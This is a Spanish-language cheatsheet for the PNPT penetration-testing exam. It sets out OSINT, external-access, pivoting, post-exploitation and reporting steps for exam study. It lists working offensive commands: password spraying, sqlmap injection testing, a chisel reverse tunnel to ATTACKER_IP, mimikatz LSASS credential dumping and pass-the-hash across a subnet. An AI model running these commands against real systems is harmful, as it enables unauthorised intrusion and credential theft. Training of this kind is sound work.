Cheatsheet PNPT 2026

Los comandos y el flujo de trabajo del examen TCM Security Practical Network Penetration Tester — OSINT, acceso externo, Active Directory, pivoting, el informe profesional y el debrief en vivo de 15 minutos.

Actualizado:

Navegación rápida

01 OSINT y Recon externo 02 Acceso externo 03 Active Directory 04 Pivoting y Tunneling 05 Post-Explotación 06 Informe y Debrief 07 Consejos del Examen

# OSINT y Recon externo

El PNPT empieza donde empieza un engagement real: el reconocimiento externo. Enumera empleados, correos y servicios expuestos para construir tu punto de entrada inicial.

💡 Consejo PNPT: el OSINT alimenta el acceso inicial. Un formato de correo válido + un portal expuesto suelen llevar a un punto de entrada por password spray.
theHarvester -d TARGET.com -b all
Recolecta correos, subdominios y hosts de fuentes públicas
subfinder -d TARGET.com -silent | httpx -silent -title -tech-detect
Enumera subdominios y hace fingerprinting de servicios externos vivos
curl -s 'https://crt.sh/?q=%.TARGET.com&output=json' | jq -r '.[].name_value' | sort -u
Certificate transparency — revela portales, VPN, webmail, staging
nmap -p- --min-rate=1000 -T4 TARGET -oN ext_ports.txt
Escaneo de puertos externo completo de los hosts en alcance

# Acceso externo

Convierte el OSINT en un punto de entrada: password spraying contra portales expuestos, explotación web y reutilización de credenciales.

netexec smb TARGET -u users.txt -p 'Temporada2026!' --continue-on-success
Password spraying — una contraseña sobre muchos usuarios (evita el bloqueo)
ffuf -u http://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -mc all -fc 404
Descubre el contenido web oculto de la aplicación externa
sqlmap -r request.txt --batch --level 5 --risk 3 --dbs
Prueba la aplicación web externa para inyección SQL

# Pivoting y Tunneling

El PNPT va de externo a interno. Pivota desde tu punto de entrada externo hacia la LAN corporativa.

./proxy -selfcert # ligolo-ng en Kali, luego añade la ruta del túnel
Inicia el proxy ligolo-ng para alcanzar la subred interna
./chisel server -p 8080 --reverse # cliente: ./chisel client ATTACKER_IP:8080 R:socks
Proxy SOCKS5 inverso a través del host comprometido
proxychains4 netexec smb 10.10.0.0/24
Enumera la red interna a través del proxy SOCKS

# Post-Explotación

Obtén credenciales, vuelca secretos y demuestra el impacto una vez que controlas los hosts.

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
Vuelca credenciales en claro y hashes de la memoria LSASS
whoami /priv # busca SeImpersonate → GodPotato para SYSTEM
Comprueba los privilegios del token para la escalada local
netexec smb 10.10.0.0/24 -u ADMIN -H NTLM_HASH --shares
Difunde el hash de DA para mapear hosts y recursos accesibles

# Informe y Debrief

El PNPT no termina en Domain Admin. Debes entregar un informe profesional Y defenderlo en un debrief en vivo de 15 minutos.

💡 Consejo PNPT: el debrief evalúa la comprensión, no la ejecución. Para cada paso, prepárate para explicar POR QUÉ funcionó y cómo remediarlo.
# Resumen ejecutivo → Relato de ataque (ruta a DA) → Resumen compromiso AD → Hallazgos → Recomendaciones
El esqueleto del informe PNPT — bastante claro para presentarlo en vivo
# Prep del debrief: diagrama de la ruta de ataque + 1 frase «por qué» por paso + remediación
Ensaya tu recorrido de 15 minutos con el evaluador

# Consejos del Examen PNPT

Estrategia para los 5 días de examen, el informe y el debrief en vivo.

🕵️ Empieza con OSINT: tu punto de entrada suele venir del reconocimiento externo — enumera usuarios y portales antes que nada.
🗣️ Prepara el debrief pronto: toma notas limpias y capturas sobre la marcha para que el recorrido de 15 minutos sea sencillo.
🏰 El AD interno es el núcleo: practica Responder, ntlmrelayx, BloodHound y el movimiento lateral hasta el automatismo.
📝 El informe importa: redacta un informe real tipo cliente — se califica y guía tu debrief.
🔁 Un reintento gratis: el PNPT está pensado para ser accesible — sin pánico, la metodología supera a la velocidad.

❓ Preguntas frecuentes PNPT

El PNPT de TCM Security es un examen práctico de 5 días contra una red Active Directory realista, seguido de 2 días para redactar un informe profesional, y un debrief en vivo obligatorio de 15 minutos donde presentas tus hallazgos a un evaluador de TCM. Debes comprometer el dominio Y defender tu metodología.

El debrief es una videollamada en vivo de 15 minutos con un evaluador de TCM tras entregar tu informe. Recorres tu ruta de ataque y respondes preguntas. Evalúa la comprensión, no solo la ejecución — debes explicar POR QUÉ funcionó cada paso.

El PNPT suele verse como más accesible y realista: fuerte componente externo-a-interno y OSINT, gran enfoque en Active Directory, sin buffer overflow, y un debrief en vivo. La OSCP tiene máquinas independientes y una ventana más corta de 23h45. Ambos son respetados; el PNPT enfatiza un flujo de trabajo de engagement real.

theHarvester y herramientas OSINT, nmap, Responder y ntlmrelayx, BloodHound, impacket (GetUserSPNs, secretsdump, psexec), NetExec/CrackMapExec, evil-winrm, mimikatz, y ligolo-ng o chisel para el pivoting. El informe se redacta como un engagement de cliente real.

Sí — es el núcleo del examen. Tras el punto de entrada externo, pivotas internamente y atacas AD: envenenamiento LLMNR/NBT-NS (Responder), NTLM relay, Kerberoasting, pass-the-hash, token impersonation y movimiento lateral hasta Domain Admin.

Muy importante. A diferencia de la mayoría de los exámenes, el PNPT empieza con una fase de OSINT externo — enumerando empleados, correos y servicios expuestos para construir un punto de entrada (por ejemplo un password spray contra un portal expuesto). El OSINT alimenta directamente el acceso inicial.

No. El PNPT no incluye explotación manual de buffer overflow. Se centra en OSINT, acceso externo, Active Directory, pivoting e informe — un flujo de trabajo realista de test de intrusión de red interna.

Sí. El voucher del PNPT incluye un reintento gratuito, y el modelo de TCM Security está pensado para ser accesible. Consulta la política actual de TCM Security para los detalles exactos antes de programar.

Un informe profesional tipo cliente: resumen ejecutivo, alcance, relato de ataque (ruta hacia Domain Admin), hallazgos técnicos con severidad y remediación, y recomendaciones estratégicas. Debe ser lo bastante claro para presentarlo en vivo durante el debrief de 15 minutos.

Sí — como acelerador de preparación. El mapa mental gratuito organiza 12.020+ comandos por los dominios del PNPT (OSINT, AD, pivoting), el Espacio Pentest incluye una plantilla de informe PNPT dedicada con un resumen de compromiso de AD, y el AI Wizard genera un informe estilo PNPT. Respeta siempre las reglas de tu examen.

📚 Recursos relacionados

Informe PNPT asistido por IA

Convierte tus hallazgos en un informe PNPT con un resumen de compromiso de AD — el AI Wizard tiene un formato PNPT dedicado listo para tu debrief.

Probar gratis →

Prepara tu PNPT con 12.020+ comandos

Esta cheatsheet es solo la superficie. Pentest Mindmap organiza 12.020+ comandos en 34 categorías con búsqueda instantánea, una plantilla de informe PNPT y un generador de informes con IA.

Empezar gratis →
📎 ¿Te ha resultado útil esta cheatsheet?